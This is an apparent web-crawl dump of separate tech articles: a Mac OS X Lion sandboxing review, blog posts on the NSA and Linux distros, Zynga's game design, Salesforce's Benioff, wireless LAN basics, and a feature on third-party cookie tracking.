cool, or perhaps I'll finally learn a real instrument like an electric guitar... Who knows? During university times, I worked at the local cinema as a projectionist. Our projection room (to the right) looked remarkably similar to this photo from the Wikipedia article on projectionists. Back then, a projectionist had to do real work, such as splicing together 6 rolls of film (coming in boxes, no reels) into two reels (about one hour each) and manage the transition from one projector to the next during the show without the audience noticing too much. Of course a film would rip in the middle of the movie more often than not and then you had to run back to the projection room very quickly unless you wanted to spend the rest of the night trying to wind half a mile of film back onto the reel. I still keep a piece of film in my wallet as a lucky charm and occasionally I pull it out to show how the Dolby Pro-Logic, Dolby Digital, DTS and SDDS sound systems work on film. Today, I like tweaking my home cinema to get good audio and video quality and it's sad to see how bad the quality of cinemas have become as they spend less and less in getting image and audio quality right. In the mid nineties, I ran my university's web server www.tu-clausthal.de and in 1997, I got hired by Sun to run the ARD webserver, (ARD is the biggest German public TV network), which back then was sponsored by Sun. I still was a student and I did it as a contractor for Sun, but that gave me a nice topic for my master thesis, a motivation to finish my studies and start working as an SE for Sun in 1998. I like to make up funny, useless words. They just pop into my mind and I end up using them for stuff. Think something like "Gadonga". When my daughter Amanda was born, we said she looked like a cute little "Maus" (mouse in German). Well, the Spanish female diminuitive ending is "-ita", so we often call her now "Mausita". I hope she won't hate me for this when she reaches her teen age :). Well, I hope this was not too boring, and I now get to tag 7 other people: Rolf (@rolfk), who is currently enjoying Wall Street Journal fame, Chaosblog (@ | 计算机 |
2015-48/3681/en_head.json.gz/14795 | Archive for the ‘Operating System U’ Category Looking out over the horizon
Larry 3 comments
The last couple of weeks have been filled with resume-sending, waiting by the phone for the resumes to do their trick, and a trip to Arizona for a plethora of family reasons (wife went to do some New Age thing in Sedona while daughter visited friends in Phoenix — heck, I even got a phone interview with a tech company there). But while I was driving around the Southwest, a few things crossed the proverbial radar that deserve special mention, like . . .
Congratulate me, I’m an “extremist”: And give yourself a good pat on the back, too, because if you’re a Linux Journal reader, the NSA thinks you are an “extremist,” too. Kyle Rankin reports on the site on the eve of Independence Day — irony much? — that the publication’s readers are flagged for increased surveillance. That includes — oh, I don’t know — just about everyone involved to some degree with Free/Open Source Software and Linux (and yes, Richard Stallman, that would also include GNU/Linux, too), from the noob who looked up “network security” to the most seasoned greybeard.
Rankin writes, “One of the biggest questions these new revelations raise is why. Up until this point, I would imagine most Linux Journal readers had considered the NSA revelations as troubling but figured the NSA would never be interested in them personally. Now we know that just visiting this site makes you a target. While we may never know for sure what it is about Linux Journal in particular, the Boing Boing article speculates that it might be to separate out people on the Internet who know how to be private from those who don’t so it can capture communications from everyone with privacy know-how.”
So, a quick note to our friends in the main office of the NSA in Maryland, where someone has drawn the unfortunate assignment of reading this (my apologies for not being a more exciting “extremist”) because . . . well, you know . . . I’m an “extremist” using Linux. Please pass this run-on sentence up your chain of command: “The right of the people to be secure in their persons, houses, papers, and effects, against unreasonable searches and seizures, shall not be violated, and no Warrants shall issue, but upon probable cause, supported by Oath or affirmation, and particularly describing the place to be searched, and the persons or things to be seized.”
That’s the Fourth Amendment to the United States Constitution, in case you hadn’t noticed.
One more thing: Linux Journal webmaster Katherine Druckman (sorry, the term “webmistress,” as noted on the LJ site, needs to be thrown into the dustbin of history) says that, yeah, maybe readers are a little extreme and asks readers to join them in supporting “extremist” causes like Free/Open Source Software and hardware, online freedom, and the dissemination of helpful technical knowledge by adding the graphic featured above (it comes in red, black, or white) to your site, your social media, or wherever you deem fit.
On a more positive note . . .
Introducing Xiki: Command-line snobs, welcome to the future. In a Linux.com article, Carla Schroder introduces Xiki, an interactive and flexible command shell 10 years in the making. It’s a giant leap forward in dealing with what some consider the “black magic” of the command line, but Carla points out another, more significant, use for the software.
Carla writes, “When I started playing with Xiki it quickly became clear that it has huge potential as an interface for assistive devices such as Braille keyboards, wearable devices like high-tech glasses and gloves, prosthetics, and speech-to-text/text-to-speech engines, because Xiki seamlessly bridges the gap between machine-readable plain text and GUI functions.”
It could be the next big thing in FOSS and deserves a look.
Another day, another distro: Phoronix reported last week a peculiar development which either can be considered yet another Linux distro on the horizon or a bad joke. According to the article, Operating System U is the new distro and the team there wants to create “the ultimate operating system.” To do that, the article continues, the distro will be based on Arch with a modified version of the MATE desktop and will use — wait for it — Wayland (putting aside for a moment that MATE doesn’t have Wayland support, but never mind that). But wait, there’s more: Operating System U also plans to modify the MATE Desktop to make it better while also developing a new component they call Startlight, which pairs the Windows Start Button with Apple’s Spotlight.
The team plans a Kickstarter campaign later this month in an attempt to raise $150,000. A noble effort or reinventing the wheel? I’d go with the latter. Our friends at Canonical have dumped a ton of Mark Shuttleworth’s money into trying to crack the desktop barrier and, at this point, they have given up to follow other form factors. Add to this an already crowded field of completely adequate and useable desktop Linux distros that would easily do what Operating System U sets out to do, and you have to wonder about the point of this exercise.
Additionally, for a team portraying itself to be so committed to open source, there seems to be a disconnect of sorts around what community engagement entails. A telling comment in the article is posted by flexiondotorg — and if it’s the person who owns that site, it’s Martin Wimpress of Hamshire, England, an Arch Linux Trusted User, a member of the MATE Desktop team, a GSoC 2014 mentor for openSUSE and one of the Ubuntu MATE Remix developers. Martin/flexiondotorg says this: “I have a unique point of view on this. I am an Arch Linux TU and MATE developer. I am also the maintainer for MATE on Arch Linux and the maintainer for Ubuntu MATE Remix.
“None of the indivuals involved with Operating System U have approached Arch or MATE, nor contributed to either project, as far as I can tell. I’d also like to highlight that we (the MATE team) have not completed adding support for GTK3 to MATE, although that is a roadmap item due for completion in MATE 1.10 and a precursor to adding Wayland support.
“I can only imagine that the Operating System U team are about to submit some massive pull-requests to the MATE project what with the ‘CEO’ proclaiming to be such an Open Source enthusiast. If Operating System U are to be taken seriously I’d like to see some proper community engagement first.”
Proper community engagement — what a concept! This blog, and all other blogs by Larry the Free Software Guy, Larry the CrunchBang Guy, Fosstafarian, Larry the Korora Guy, and Larry Cafiero, are licensed under the Creative Commons Attribution-NonCommercial-NoDerivs CC BY-NC-ND license. In short, this license allows others to download this work and share it with others as long as they credit me as the author, but others can’t change it in any way or use it commercially.
Categories: free software, linux, Linux, Linux Journal, Mark Shuttleworth, open source, Operating System U, Phoronix, Ubuntu, Xiki
Tags: linux, Linux Journal, Mark Shuttleworth, NSA, open source, Phoronix, Ubuntu
Blog at WordPress.com. The INove Theme. Larry the Free Software Guy Blog at WordPress.com. The INove Theme. Follow | 计算机 |
2015-48/3682/en_head.json.gz/37 | Mac OS X 10.7 Lion: the Ars Technica review
Lion is no shrinking violet.
by John Siracusa
The previous release of Mac OS X focused on internal changes. My review did the same, covering compiler features, programming language extensions, new libraries, and other details that were mostly invisible to end-users.
Lion is most definitely not an internals-focused release, but it's also big enough that it has its share of important changes to the core OS accompanying its more obvious user-visible changes. If this is your first time reading an Ars Technica review of Mac OS X and you've made it this far, be warned: this section will be even more esoteric than the ones you've already read. If you just want to see more screenshots of new or changed applications, feel free to skip ahead to the next section. We nerds won't think any less of you.
Apple's approach to security has always been a bit unorthodox. Microsoft has spent the last several years making security a top priority for Windows, and has done so in a very public way. Today, Windows 7 is considered vastly more secure than its widely exploited ancestor, Windows XP. And despite the fact that Microsoft now distributes its own virus/malware protection software, a burgeoning market still exists for third-party antivirus software.
Meanwhile, on the Mac, Apple has only very recently added some basic malware protection to Mac OS X, and it did so quietly. Updates have been similarly quiet, giving the impression that Apple will only talk about viruses and malware if asked a direct question about a specific, real piece of malicious software.
This approach is typical of Apple: don't say anything until you have something meaningful to say. But it can be maddening to security experts and journalists alike. As for end-users, well, until there is a security problem that affects more than a tiny minority of Mac users, it's hard to find an example of how Apple's policies and practices have failed to protect Mac users at least as well as Microsoft protects Windows users.
Sandboxing
Just because Apple is quiet, that doesn't mean it hasn't been taking real steps to improve security on the Mac. In Leopard, Apple added a basic form of sandboxing to the kernel. Many of the daemon processes that make Mac OS X work are running within sandboxes in Snow Leopard. Again, this was done with little fanfare.
Running an application inside a sandbox is meant to minimize the damage that could be caused if that application is compromised by a piece of malware. A sandboxed application voluntarily surrenders the ability to do many things that a normal process run by the same user could do. For example, a normal application run by a user has the ability to delete every single file owned by that user. Obviously, a well-behaved application will not do this. But if an application becomes compromised, it may be coerced into doing something destructive.
In Lion, the sandbox security model has been greatly enhanced, and Apple is finally promoting it for use by third-party applications. A sandboxed application must now include a list of "entitlements" describing exactly what resources it needs in order to do its job. Lion supports about 30 different entitlements which range from basic things like the ability to create a network connection or to listen for incoming network connections (two separate entitlements) to sophisticated tasks like capturing video or still images from a built-in camera.
It might seem like any nontrivial document-based Mac application will, at the very least, need to declare an entitlement that will allow it to both read from and write to any directory owned by the current user. After all, how else would the user open and save documents? And if that's the case, wouldn't that entirely defeat the purpose of sandboxing?
Apple has chosen to solve this problem by providing heightened permissions to a particular class of actions: those explicitly initiated by the user. Lion includes a trusted daemon process called Powerbox (pboxd) whose job is to present and control open/save dialog boxes on behalf of sandboxed applications. After the user selects a file or directory into which a file should be saved, Powerbox pokes a hole in the application sandbox that allows it to perform the specific action.
A similar mechanism is used to allow access to recently opened files in the "Open Recent" menu, to restore previously open documents when an application is relaunched, to handle drag and drop, and so on. The goal is to prevent applications from having to request entitlements that allow it to read and write arbitrary files. Oh, and in case it doesn't go without saying, all sandboxed applications must be signed.
Here are a few examples of sandboxed processes in Lion, shown in the Activity Monitor application with the new "Sandbox" column visible:
Sandboxed processes in Lion
Earlier, the Mac App Store was suggested as a way Apple might expedite the adoption of new Lion technologies. In the case of sandboxing, that has already happened. Apple has decreed that all applications submitted to the Mac App Store must be sandboxed, starting in November.
Privilege separation
One limitation of sandboxing is that entitlements apply to an entire process. A sandboxed application must therefore possess the superset of all entitlements required for each feature it provides. As we've seen, the use of the Powerbox daemon process prevents applications from requiring arbitrary access to the file system by delegating those entitlements to another, external process. This is a specific case of the general principle called privilege separation.
The idea is to break up a complex application into individual processes, each of which requires only the few entitlements necessary to perform a specific subset of the application's total capabilities. For example, consider an application that needs to play video. Decoding video is a complex and performance-sensitive process which has historically led to inadequate protection against buffer overflows and other security problems. An application that needs to display video will likely do so using libraries provided by the system, which means that there's not much a third-party developer can do to patch vulnerabilities where they occur.
What a developer can do instead is isolate the video decoding task in its own process with severely reduced privileges. A process that's decoding video probably doesn't need any access to the file system, the network, the built-in camera and microphone, and so on. It just needs to accept a stream of bytes from its parent process (which, in turn, probably used Powerbox to gain the ability to read those bytes from disk in the first place) and return a stream of decoded bytes. Beyond this simple connection to its parent, the decoder can be completely walled off from the rest of the system. Now, if an exploit is found in a video codec, a malicious hacker will find himself in control of a process with so few privileges that there is little harm it can do to the system or the user's data.
Though this was just an example, the QuickTime Player application in Lion does, in fact, delegate video decoding to an external, sandboxed, extremely low-privileged process called VTDecoderXPCService.
QuickTime Player with its accompanying sandboxed video decoder process
Another example from Lion is the Preview application, which completely isolates the PDF parsing code (another historic source of exploits) from all access to the file system.
Putting aside the security advantages of this approach for a moment, managing and communicating with external processes is kind of a pain for developers. It's certainly less convenient than the traditional approach, with all code within a single executable and no functionality more than a function call away.
Once again in Lion, Apple has provided a new set of APIs to encourage the adoption of what it considers to be a best practice. The XPC Services framework is used to manage and communicate with these external processes. XPC Service executables are contained within an application's bundle. There is no installation process, and they are never copied or moved. They must also be part of the application's cryptographic signature in order to prevent tampering.
The XPC Service framework will launch an appropriate external process on demand, track its activity, and decide when to terminate the process after its job is done. Communication is bidirectional and asynchronous, with FIFO message delivery, and the default XPC process environment is extremely restrictive. It does not inherit the parent process's sandbox entitlements, Keychain credentials, or any other privileges.
The reward for breaking up an application into a collection of least-privileged pieces is not just increased security. It also means that a crash in one of these external processes will not take down the entire application.
We've seen this kind of privilege separation used to great effect in recent years by Web browsers on several different platforms, including Safari on Mac OS X. Lion aims to extend these advantages to all applications. It also makes Safari's privilege separation even more granular.
Safari in Lion is based on WebKit2, the latest and greatest iteration of the browser engine that powers Safari, Chrome, and several other desktop and mobile browsers. Safari in Snow Leopard already separated browser plug-ins such as Flash into their own processes. (Adobe should not consider this an insult; Apple does the same with its own QuickTime browser plug-in.) As if to further that point, WebKit2 separates the entire webpage rendering task into an external process. The number of excuses for the Safari application to crash is rapidly decreasing.
As the WebKit2 website notes, Google's Chrome browser uses a similar approach to isolate WebKit (version 1) from the rest of the application. WebKit2 builds the separation directly into the framework itself, allowing all WebKit2 clients to take advantage of it without requiring the custom code that Google had to write for Chrome. (Check out the process architecture diagrams at the WebKit2 site for more detailed comparisons with pre-Lion WebKit on Mac OS X and Chrome's use of WebKit.)
Page: 1 2 ... 8 9 10 ... 18 19 Next → Reader comments 401
John Siracusa / John Siracusa has a B.S. in Computer Engineering from Boston University. He has been a Mac user since 1984, a Unix geek since 1993, and is a professional web developer and freelance technology writer.
@siracusa on Twitter | 计算机 |
2015-48/3682/en_head.json.gz/270 | Zynga and Fundamental Problems with their Social Network Games by Lewis Pulsipher on 09/16/12 09:06:00 am Post A Comment
As you probably know, Zynga's stock is priced far below its IPO cost, and many executives are leaving the company.� It's not like they're losing money, but they're losing mind-share rapidly.� Will Zynga be able to turn around this trend?Zynga's fundamental problem may be the fundamental characteristic of the video game industry as a whole: video games are designed to be played for a while and then discarded.� You "beat the game" or you learn the story, or you get tired of "the grind", because there's an emphasis on the destination, not on the journey.Good board and card games are played over and over again, over the course of many years.� I know people who have played my five hour board game Britannia five hundred times, and undoubtedly there are other board and card games of similar longevity.� I may have played the tabletop RPG D&D that many hours.� Video games do not match that, though MMOs can approach it.� But social network games are nothing like MMOs.Inevitably, in a video game that more or less constantly asks you for money, that builds in frustration so that you'll spend money to stop being frustrated, the player will get tired of the game and quit playing.� And when the next game is practically just like the last (as is typical of Zynga Facebook games), the player is going to get tired of the next one that much sooner.Yet Zynga is so big, every incentive is to avoid risk, hence the games are the same over and over again.� Because they still draw millions of players, it's just the same group over and over again.� But that group may be getting smaller.Traditional arcade games were so hard you couldn't beat them, so many players kept going until they could no longer improve.� But this is a new century, people don't want hard games, they want entertainment and time-killing and playgrounds, so social network games are stupendously easy to play.� They are mass-market games, a completely different "kettle of fish".� Contrast Zynga's big-company low-risk mentality with King.com's small teams churning out games every 3 months for online trials.� Then they turn the most successful into social networking games.The following explains the key to making really good games: ��� . . . Just Cause 2 developer explains that while most developers produce downloadable content to prolong user engagement, the real trick to long-term success is to make a game that players don't want to put down in the first place.��� ��� "We create a game allowing players to properly explore and have fun and not focusing so much on the actual end goal of the game," he says. In other words, make a game where people enjoy the journey, not just the destination.**My book “Game Design: How to Create Video and Tabletop Games, Start to Finish" is now available from mcfarlandpub.com or Amazon.�� I am @lewpuls on Twitter.� (I average much less than one post a day, almost always about games, not about other topics.)� Web: http://pulsiphergames.com/
/blogs/LewisPulsipher/20120916/177798/Zynga_and_Fundamental_Problems_with_their_Social_Network_Games.php | 计算机 |
2015-48/3682/en_head.json.gz/989 | The Man Who Moved a Paradigm
An evaluation of the changes wrought by Salesforce.com's Marc Benioff.
By Denis Pombriant
For the rest of the November 2009 issue of CRM magazine please click here
I think we have enough data to call this one: Marc Benioff should go down in history — or at least the history of the software industry — for his nearly single-handed invention of on-demand computing. There are numerous others who could at least plausibly lay claim to that achievement, many with stronger technology credentials and some (including Larry Ellison himself) who worked, as Benioff did, at Oracle. But Benioff’s contribution goes much deeper than any of the others’ because he was the one who knew, or figured out, how to change the software market’s paradigm.If changing a paradigm were easy, we’d already have universal healthcare and electric cars would’ve been a hit. But changing a paradigm is hard: You have to scrape one idea out of the minds of millions of people and replace it with your idea — and you have only the existing tools to do that with. Yet Benioff accomplished the feat with apparent ease. It’s already difficult for many of us to recall how entrenched the software industry was before Salesforce.com. There simply was no other way to deliver software back then, and few of us could imagine any alternative to buying a license, installing it, and hoping for the best. Multiple operating systems, databases, middleware — the hat trick of modern computing was to get all those planets to align. Then you needed to have the applications actually do something that could improve your productivity. Oh, and did I mention the cost?Forgive me if I sound a little too much like a fan but I believe it’s reasonable to place Benioff in the pantheon that includes Henry Ford and possibly (though he resides on a higher plane) Thomas Edison. Ford and Edison did some amazing things but each had the relative advantage of starting with a clean slate. There were virtually no assembly lines before Ford, and no one before Edison had seriously considered how wonderful the world would be with recorded music, electric light, or motion pictures.A shift of such magnitude requires a moment of crisis, one that provides a catalyst to change people’s minds, to reverse the inclination to say “If it ain’t broke….” Benioff found the broken part of the software industry, held it up for all to see, and never let us forget that it was broken.
“No Software” wasn’t just a marketing slogan — it was a mantra. Sure, we all laughed at Benioff’s seemingly quixotic battle against Siebel Systems — but he needed the biggest target he could find in his market. Along with a growing band of believers, he hammered away relentlessly. The Salesforce.com initial offering had few of the features and little of the functionality of the traditional CRM product but, in a world buffeted by a succession of long, expensive, and often failure-prone implementations, Salesforce.com’s solution delivered the one virtue the traditional vendors could not: It worked. Within an incredibly short time, users could be up and running and productive. Competitors tried to emulate Salesforce.com’s success but always seemed constrained by the conventional software box. It’s doubtful that any of them fully shared Benioff’s vision of a wholly on-demand world, and most were happy to compete on low prices rather than the true advantages of software-as-a-service. In the end, even the most-probable contenders proved unable to compete, and companies such as UpShot and Salesnet were absorbed into other entities.Today, 10 years on, Salesforce.com is a billion-dollar company and the software industry has been irreversibly changed. This disruption and the industry spawned by Benioff and his company and his vision represent the epitome of business evolution, which, after all, has no goal other than to produce the most fit result for the present moment. It remains to be seen whether Benioff, in this new moment he helped create, will uncover another quixotic quest of the same magnitude. No matter what, it’ll certainly be interesting to watch. Denis Pombriant, founder and managing principal of CRM market research firm and consultancy Beagle Research Group, has been writing about CRM since January 2000, and was the first analyst to specialize in on-demand computing. His 2004 white paper, “The New Garage,” laid out the blueprint for cloud computing. He can be reached at [email protected], or on Twitter (@denispombriant).You may leave a public comment regarding this article by clicking on "Comments" at the top.To contact the editors, please email [email protected]. Every month, CRM magazine covers the customer relationship management industry and beyond. To subscribe, please visit http://www.destinationCRM.com/subscribe/. | 计算机 |
2015-48/3682/en_head.json.gz/1222 | Wireless/High Speed/Optical
Wireless LANs
By William Stallings
␡ Wireless LAN Applications
Wireless LAN Requirements
IEEE 802.11 Services
IEEE 802.11 Options
In his fifth article in a seven-part series, network expert Bill Stallings provides an overview of wireless LANs and the IEEE 802.11 standards.
From the author of
From the author of
Local and Metropolitan Area Networks, 6th Edition
From the author of
In just the past few years, wireless LANs have come to occupy a significant niche in the local area network market. Increasingly, organizations are finding that wireless LANs are an indispensable adjunct to traditional wired LANs, to satisfy requirements for mobility, relocation, ad hoc networking, and coverage of locations difficult to wire.
As the name suggests, a wireless LAN is one that makes use of a wireless transmission medium. Until relatively recently, wireless LANs were little used. The reasons for this included high prices, low data rates, occupational safety concerns, and licensing requirements. As these problems have been addressed, the popularity of wireless LANs has grown rapidly.
Wireless LANs Applications
Early wireless LAN products, introduced in the late 1980s, were marketed as substitutes for traditional wired LANs. A wireless LAN saves the cost of the installation of LAN cabling and eases the task of relocation and other modifications to network structure. In a number of environments, there is a role for the wireless LAN as an alternative to a wired LAN. Examples include buildings with large open areas, such as manufacturing plants, stock exchange trading floors, and warehouses; historical buildings with insufficient twisted pair wiring or where drilling holes for new wiring is prohibited; and small offices where installation and maintenance of wired LANs is not economical. In all of these cases, a wireless LAN provides an effective and more attractive alternative. In most of these cases, an organization will also have a wired LAN to support servers and some stationary workstations. For example, a manufacturing facility typically has an office area that's separate from the factory floor but that must be linked to it for networking purposes. Therefore, typically, a wireless LAN will be linked into a wired LAN on the same premises. Thus, this application area is referred to as a LAN extension.
Figure 1 shows a simple wireless LAN configuration that's typical of many environments. A backbone wired LAN, such as Ethernet, supports servers, workstations, and one or more bridges or routers to link with other networks. In addition, a control module (CM) acts as an interface to a wireless LAN. The control module includes either bridge or router functionality to link the wireless LAN to the backbone. It also includes some sort of access-control logic, such as a polling or token-passing scheme, to regulate the access from the end systems. Notice that some of the end systems are standalone devices, such as a workstation or a server. Hubs or other user modules (UMs) that control a number of stations off a wired LAN may also be part of the wireless LAN configuration.
Single-cell wireless LAN configuration.
The configuration of Figure 1 can be referred to as a single-cell wireless LAN; all of the wireless end systems are within range of a single control module. Another common configuration is a multiple-cell wireless LAN. In this case, multiple control modules are interconnected by a wired LAN. Each control module supports a number of wireless end systems within its transmission range. For example, with an infrared LAN, transmission is limited to a single room; therefore, one cell is needed for each room in an office building that requires wireless support.
Another use of wireless LAN technology is to support nomadic access by providing a wireless link between a LAN hub and a mobile data terminal equipped with an antenna, such as a laptop computer or notepad computer. One example of the utility of such a connection is to enable an employee returning from a trip to transfer data from a personal portable computer to a server in the office. Nomadic access is also useful in an extended environment such as a campus or a business operating out of a cluster of buildings. In both of these cases, users may move around with their portable computers and may want access to the servers on a wired LAN from various locations.
Another example of a wireless LAN application is an ad hoc network, which is a peer-to-peer network (no centralized server) set up temporarily to meet some immediate need. For example, a group of employees, each with a laptop or palmtop computer, may convene in a conference room for a business or classroom meeting. The employees link their computers in a temporary network just for the duration of the meeting.
Network Your Computer & Devices Step by Step
By Ciprian Rusen
Cisco LAN Switching Fundamentals
By David Barnes, Basir Sakandar
eBook (Adobe DRM) $38.40
the trusted technology learning source | 计算机 |
2015-48/3682/en_head.json.gz/1532 | Who's tracking you online? PC Advisor
Security Feature
Who's tracking you online?
What happens behind the scenes when you browse the web? Companies are collecting, analysing and selling your profile without your knowledge or permission. We investigate what's going on and explain what you can do about it. Updated 12th September 2012
Find out who is spying on your web browsing and how to beat them
Martyn Casserly
| 12 Sep 12
Surf using your browser's private mode to keep trackers at bay
The internet is undoubtedly one of the greatest inventions of the modern age. Never in all of history have so many people had access to so much information, easily and - in the most part - for free. Projects such as Wikipedia have shown what can be achieved by an ideology to do good and harness the power of the masses working together for a common goal.
Where previous generations in need of knowledge had turned to the Encyclopedia Britannica (if they were fortunate enough to own the multi-volume repository) people now instead access its online contemporaries - Google, Wikipedia, or simply asking a question on Twitter. Even Britannica itself has replaced the famous leather tomes with a subscription based website that’s better equipped to keep up with the public’s constant thirst for knowledge.
Social media has grown at a phenomenal rate and with it transformed our ability to communicate on a wide scale. Tracking down old friends and colleagues is no longer the preserve of amateur detectives with a battered book of phone numbers and addresses circa 1993.
Now it’s simply a case of going on Facebook and typing in their name - unless of course they happen to be called John Smith or Patrick Murphy, then you might still be in for a spot of sleuthing.
We have available to us an incredible amount of online services such as Skype, Gmail, Google Docs, Twitter, Facebook, Dropbox, and innumerable websites that have now become an essential part of people’s lives - all of which offer their wondrous bounty for the princely sum of naught. Truly this is a golden age for technology and those that would have the good fortune to use it. But how does this make any sense at all?
We know that businesses need to make money to even exist, let alone thrive. Google’s data centres are famously home to thousands of computers, each holding fragments of the world wide web within them. YouTube users upload over 48 hours of video to the site every minute, which works out to a staggering 8 years of content every day. Facebook is currently home to over 900 million users, giving it a population greater than most countries.
We don’t pay to search, upload badly taken photographs of school plays, or watch little pandas sneezing, yet Google is one of the most profitable companies in the world and when Facebook recently went public it was valued at a whopping £66 billion. So how do they do it? What’s the secret to their success? Well, technical brilliance aside, the answer is very simple. It’s you. Or more accurately, what you like. Or even more accurately, what you are likely to buy.
The free services we access on a daily basis are watching us, where we go, what we do, and using that information to provide their advertisers, or in some cases other people’s advertisers, with profiles that enable them to sell to us more effectively and increase the chance that we will click the ‘add to basket’ button. As the saying goes ‘If you’re not paying for it, you’re not the customer; you’re the product being sold’.
Online tracking
During his recent TED talk ‘Tracking the Trackers’, Mozilla CEO Gary Kovacs discussed the idea of Behaviour Tracking and its proliferation across the web. In essence, when you visit a website a cookie is created in your browser which allows the site to know you are there and helps perform basic tasks such as maintaining the contents of your shopping basket while you continue to browse the site.
They can also gather information on the pages you visit and items you click on, so that the contents you are offered are more relevant to your tastes. Generally they enhance the browsing experience (just try disabling all cookies in your browser privacy settings to see how clunky the web can really be) and often save us from having to log in or set preferences every time we visit a favourite site.
All of this is perfectly acceptable, in fact it’s helpful, but the issue Kovacs was discussing happens after you leave the site in question and go elsewhere.
Traditionally you would expect a site to retain the information on the cookie for the duration of your stay and then for it to become inert once you leave. But that isn’t always the case. Third-Party cookies are now very likely to also be watching our movements, sometimes across several sites, and to none of which we have ever given our consent.
The effects are easy to observe, in fact you’ve probably already seen them several times. By simply browsing or searching for details on, say, the new Batman film it won’t be long until related products begin appearing in the advertisements on other sites you visit, sometimes with unnerving accuracy.
This is made possible by the relationships between the host sites and online advertising companies such as Scorecard Research, Tribal Fusion and Google’s own DoubleClick. The idea is to provide you with a more tailored experience online, and of course tempt you to click through to the item in question and make a purchase.
Revenue generated from these advertisements is quite staggering. In 2011 Google was reported to have made $37 billion, with nearly all of it coming from its AdWords and AdSense income streams. Facebook also raked in a highly respectable $3.7 billion with 85% coming from advertising. As you can see from the figures it’s no surprise that companies are very keen to know what we want to buy, and the most effective way to place those products in front of us.
The idea of our habits being monitored, especially by those that would seek to profit from it, is an uncomfortable truth that now accompanies our heavily interconnected online world. Gary Kovacs puts it very eloquently: "We are like Hansel and Gretel, leaving bread crumbs of our personal information everywhere we travel through the digital woods".
Continues on next page
Mozilla Collusion
To observe the scale of the tracking that goes on Mozilla have developed the Collusion Project, alongside its Firefox Plugin, which displays the tracking cookies in a fashion similar to cells under a microscope - and it doesn’t take long for those cells to multiply.
"On a technical level, Collusion plugs into your browser and watches all of these requests to web sites and third parties involving cookies", explains Mozilla's Ryan Merkley. "Firefox already makes a record of some of this (your browsing history) and Collusion is recording a little bit more so it can be drawn on your screen. The more you browse, the more Firefox and Collusion accumulate about the site relationships, and your graph gets larger."
That’s something of an understatement. In an experiment to see how widespread the behaviour was we cleared the browser history on one of our machines, installed Collusion, then visited some normal, everyday favourites from our bookmarks: The Guardian, Football365, Facebook, Twitter, and a few others. After viewing just nine sites, and spending less than 20 minutes online, we had been tracked by thirty five third-party cookies.
In another test we reset the browser and visited the site of a popular high-street video game retailer - the results were startling. By just landing on the home page we saw eleven third-party links appear on our Collusion graph. Ryan Merkley’s initial experience of the application was equally concerning.
"I first tried Collusion when one of our engineers shared an early proof of concept," he says. "I was shocked at the number of trackers, and most of all, by the number of times a very small group of trackers showed up. Those few trackers know more about my combined browsing habits than any website ever would. It made me want to know how they use that data, and have a tool to decide for myself whether they would be able to collect my data at all."
It’s not just the secret third-parties that watch what we do, sometimes it’s sites that we trust. In late 2011 blogger Nik Cubrilovic wrote a blog post that showed how Facebook was using persistent cookies that could track web use even after users had logged out from its site.
The news that the social media giant might be quietly watching exterior online behaviour quickly spread across the internet and brought angry responses on blog posts and forums (which to be fair is not an unusual location for those sort of reactions).
Facebook immediately addressed the issue and went to lengths to reassure people that it hadn’t gathered information but instead the cookies were used as a form of security against spammers and unauthorised log-ins. Others worked with the ‘Like’ functions found on various sites around the web. Within two days of his post Facebook fixed the apparent bugs and Cubrilovic confirmed this on his blog along with thanks for the speedy resolution.
Then shortly afterwards Cubrilovic was contacted by a friend on Twitter who had found a third party site on which Facebook has set one of the previously offending ‘datr’ cookies, only now it was capable of sending information back to Facebook without the user having ever logged in.
The cookie worked behind the ‘Like’ function on the page and was able to identify the user even if they didn’t interact with the widget. Cubrilovic investigated further and found several other sites that now had these cookies active.
Facebook was once again quick to respond, saying that this wasn’t a re-enabling of the cookies but rather a bug that affected certain sites that called the API in a non-standard way. Once again it fixed the issue and assured users that it didn’t build profiles using this kind of data.
It’s reasonable to accept what Facebook says; after all it did move to plug the gaps quickly and was public about its reasons for using cookies. However, this isn’t the only occasion on which its attitude to the privacy of user data has been brought into question.
Several times in the past few years it has introduced new functions to the site and automatically opted-in users, often making data that was previously private suddenly public - at least until tech-savvy users sent around instructions of how to reverse the problem.
The latest instance was in June when Facebook replaced every users’ email address with an @facebook.com alternative without asking their permission or even letting them know that it had happened. A story also emerged in July that revealed the existence of a Facebook ‘Data Science department’ which analyses the information the company gathers on its users to search for patterns that it may be able to use.
In the article by Tom Simonite which appeared on MIT’s Technology Review site he reported that one of the team of data scientists - Etyan Bakshy - had conducted a sutble experiment. According to Simonite, Bakshy ‘messed with how Facebook operated for a quarter of a billion users.
Over a seven-week period, the 76 million links that those users shared with each other were logged. Then, on 219 million randomly chosen occasions, Facebook prevented someone from seeing a link shared by a friend.
Hiding links this way created a control group so that Bakshy could assess how often people end up promoting the same links because they have similar information sources and interests.’ The theory might be interesting, and the results possibly useful, but the methods of obtaining the information remain highly questionable.
Who else is tracking you?
Of course it’s not only Mark Zuckerberg and his social scientists that are watching our clicks with interest. Twitter was in the news recently when it was revealed that the micro-blogging company had sold two years' worth of archived Tweets to data research company DataSift.
Social media app Path was found to be uploading the entire contact list from iPhones without the consent of their owners. Android phones (mainly in the US) were being sold with Carrier IQ software installed that some analysts believed was capable of tracking keystrokes and text messages.
Last February, The Wall Street Journal reported that Google had been tracking users of Apple’s mobile Safari browser through cookies that acted as if the user had granted permission for ads to be displayed. During the investigation it was discovered that a few other large advertising companies were also using similar coding to capitalise on the loophole in Safari.
Google responded that the newspaper mischaracterized what happened and said in a statement that it ‘used known Safari functionality to provide features that signed-in Google users had enabled. It's important to stress that these advertising cookies do not collect personal information.’
Whatever the justification Google promptly disabled the code and Apple set about closing the loophole in its browser. As we go to press there is widespread reporting that the US Federal Trade Commission is about to fine Google $22.5 million for the breach of privacy. This would make it the single biggest penalty the government body has ever handed out. The search giants also drew criticism from privacy groups after it announced the unification of its privacy policy. Previously each of its wide range of services had individual policies, all of which were specifically tailored to the nature of the application. When it decided to bring over sixty of them together under one banner it also meant that the services themselves would share information to build up a better picture of the user and their practices.
Google wasn’t collecting more information, but due to the composite nature of the different sets of data there’s no doubt that the information was more valuable to advertisers. Recently at the Google I/O developers conference the company also revealed a new feature for its Android mobile operating system - Google Now.
This acts as a personal assistant similar to Apple’s Siri, but the aim of Now is for it to learn about your behaviours - where you live, how you travel, foods you like to eat, places you like to shop - and try to provide you with information relevant to your interests by using location service to know where you are and the possibilities that exist around you. It’s hugely ambitious, possibly brilliant, but also means once more that your privacy is being brought into a questionable area when a device is tracking essentially how you live.
